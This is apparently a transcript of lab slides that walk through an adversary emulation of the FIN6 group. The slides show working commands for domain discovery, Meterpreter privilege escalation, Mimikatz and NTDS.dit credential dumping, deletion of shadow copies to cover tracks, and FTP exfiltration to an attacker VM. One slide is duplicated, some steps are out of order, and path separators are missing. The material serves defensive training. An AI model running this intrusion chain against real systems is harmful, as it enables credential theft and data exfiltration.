  • 104. Step 9: System Network Configuration Discovery FIN6 procedure: adfind.exe -subnets -f "objectcategory=subnet" > ad_subnets.txt FIN6 then performs System Network Configuration Discovery (T1016) to list subnets within the network. As the target network consists of just 1 host, there will not be much information returned from this procedure, but we still perform it as a learning activity.
  • 105. Step 9: System Network Configuration Discovery (contd.) Get-ADReplicationSubnet -Filter * > ad_subnets_ps.txt Alternative procedure: Again, as there are no subnets in our test domain, there is no output from this command.
  • 106. Step 10: Permission Groups Discovery: Domain Groups FIN6 procedure: adfind.exe -f "objectcategory=group" > ad_group.txt The last discovery technique that FIN6 performs in this emulation plan is Permission Groups Discovery: Domain Groups (T1069.002). FIN6 uses AdFind to list groups in the domain and writes the output to a file.
  • 107. Step 10: Permission Groups Discovery: Domain Groups (contd.) Alternative procedure: net group /domain > ad_group_net.txt
  • 108. Step 11: Access Token Manipulation Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario, we specify the use of the named-pipe impersonation method. Further information can be found in the documentation for Meterpreter. To perform the FIN6 procedure, we first need to exit the PowerShell shell within our Meterpreter session, to bring us back to the meterpreter> prompt. Ctrl+C y FIN6 procedure: getsystem -t 1
  • 109. Step 11: Access Token Manipulation Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario, we specify the use of the named-pipe impersonation method. Further information can be found in the documentation for Meterpreter. To perform the FIN6 procedure, we first need to exit the PowerShell shell within our Meterpreter session, to bring us back to the meterpreter> prompt. Ctrl+C y FIN6 procedure: getsystem -t 1
  • 110. Step 11: Access Token Manipulation (contd.) Running getuid again, we see that we are now the NT SYSTEMAUTHORITY user, which means we now have additional privileges on the targetDC. The alternative procedure uses the PowerSploit PowerShell module, which contains a PowerShell function called Get-System, to also elevate privileges using the same named-pipe impersonation method. However, executing it crashes the Meterpreter shell. As a result, we leave it out of this lab walkthrough
  • 111. Step 12: OS Credential Dumping After gaining elevated access to a target system, FIN6 has been found to dump credentials. The FIN6 Emulation Plan lists three separate procedures through which FIN6 has been reported to dump credentials. The first procedure performs OS Credential Dumping: LSASS Memory (T1003.001) using Meterpreter’s Mimikatz module. Run the following commands from the meterpreter> prompt to load the Mimikatz module into the Meterpreter session and then retrieve wdigest credentials: load kiwi creds_all
  • 112. Step 12: OS Credential Dumping (contd.) The second procedure performs OS Credential Dumping: NTDS (T1003.003) by using Metasploit’s psexec_ntdsgrab module to download copies of the NTDS.dit file and the System registry hive. NTDS.dit is a database file containing Active Directory data, including usernames and hashed passwords. The SYSTEM registry hive and SYSTEM configuration file contain information that can be used to crack the passwords stored in NTDS.dit. The Metasploit module can have issues in execution, especially as Windows changes over time. Instead, we’ll perform the attack manually, which also gives us the opportunity to better understand the attack. If you recall from the last step, we escalated our user context to the NT SYSTEMAUTHORITY user, which is the user account with the most permissive access on the system. However, parts of this procedure require that they be run as a regular user in an elevated context to properly work. We can get back to our elevated madAdmin user context by migrating to a process that is running in that particular context. Process migration is a fairly complicated process. Meterpreter makes this very simple and transparent to us though. We’ll migrate back to the Word process, as we launched it as an Administrator, using the following command: migrate -N WINWORD.EXE getuid
  • 113. Step 12: OS Credential Dumping (contd.) The first thing we do is create a Volume Shadow Copy of the C: drive. A Volume Shadow Copy is a snapshot of a set of files, which can be accessed to copy files even when the originals are currently being used by Windows. We do this using the Volume Shadow Copy Service: shell We see that we are back to the MADmadAdmin user. From here, we can proceed with the credential access procedure. From the meterpreter> prompt, drop into a Command Prompt shell: vssadmin create shadow /for=C:
  • 114. Step 12: OS Credential Dumping (contd.) We also copy the SYSTEM registry hive and SYSTEM configuration file to the same directory, again with the same prefix as before. As before, replace the placeholder with the Shadow Copy Name we noted. copy <shadow_copy_name>windowsntdsntds.dit C:UsersPublicad_ntds.dit Now, copy the NTDS.dit file from the Shadow Copy to the C:UsersPublic directory, with a prefix for easy identification. Make sure to replace the placeholder with the value we just noted. Take note of the Shadow Copy ID and Shadow Copy Name as we’ll need them for the next commands. reg SAVE HKLMSYSTEM C:UsersPublicad_SYS_reg copy <shadow_copy_name>windowssystem32configSYSTEM C:UsersPublicad_SYSTEM_cfg
  • 115. Step 12: OS Credential Dumping (contd.) vssadmin delete shadows /shadow=<volume_shadow_id> /Quiet We’ll extract these files in a later step. For now, we’ll delete the Shadow Volume Copy we created to erase some of our tracks. Replace the placeholder value in the command below with the Volume Copy ID noted earlier.
  • 116. Step 13: Archive Collected Data: Archive via Utility cd C:UsersPublic 7.exe a -mx3 ad.7z ad_* After completing their discovery and collection activities, FIN6 archives all their collected data using a renamed command-line version of 7-Zip in preparation for exfiltration (T1560.001).
  • 117. Step 14: Exfiltration Over Web Service The last task in the CTID FIN6 Emulation Plan is to exfiltrate the collected data. At the time of creating this lab, the Emulation Plan called for the use of Plink.exe to perform the exfiltration; however, the plan did not clarify how to perform the file transfer. Instead of simply using the provided Alternative Procedure, we can use this as an exercise to examine existing Cyber Threat Intelligence to determine a procedure that allows for a more faithful emulation. The IBM X-Force Exchange report found here indicates that FIN6 has used FTP to exfiltrate data to their systems.
  • 118. Step 14: Exfiltration Over Web Service (contd.) With this knowledge, we can proceed with exfiltration, but this time using FTP. The first thing we need to do is to set up an FTP server on the attackerVM host. Go back to the terminal tab that was used to run the Python3 HTTP Server. Terminate the server by typing: Ctrl + C We will now use a Python3 FTP module to run an FTP server on the attackerVM: sudo python3 -m pyftpdlib -w -p21 -d /home/attacker/AdversaryEmulation/labs/lab_1.3 -u ftpuser -P ftppass
  • 119. Step 14: Exfiltration Over Web Service (contd.) echo open {attackerVM_ip_address}> ftp.txt echo ftpuser>> ftp.txt echo ftppass>> ftp.txt echo put ad.7z>> ftp.txt echo bye>> ftp.txt With the FTP server set up, we can go back to our Meterpreter tab to upload the archive file using FTP. One thing to note is that the Windows FTP client is interactive. Due to the nature of the Meterpreter reverse shell, we are not able to interact with an interactive prompt. Instead, we need to write all the FTP commands we wish to run to a file, and then run the FTP client in non- interactive mode by passing it the file we just wrote. To write the file from a non-interactive prompt, run the following commands, replacing the IP placeholder with the appropriate value:
  • 120. Step 14: Exfiltration Over Web Service (contd.) ftp –s:ftp.txt Finally, we can run the FTP client by passing in our text file with commands: Let’s go back to the FTP terminal tab and terminate the server with Ctrl+C as we no longer need it. Listing the contents of our lab folder, we can see that the file we uploaded is now present on the attackerVM. That brings us to the end of the emulation plan and the lab. Congratulations, you’ve successfully performed an Adversary Emulation Exercise!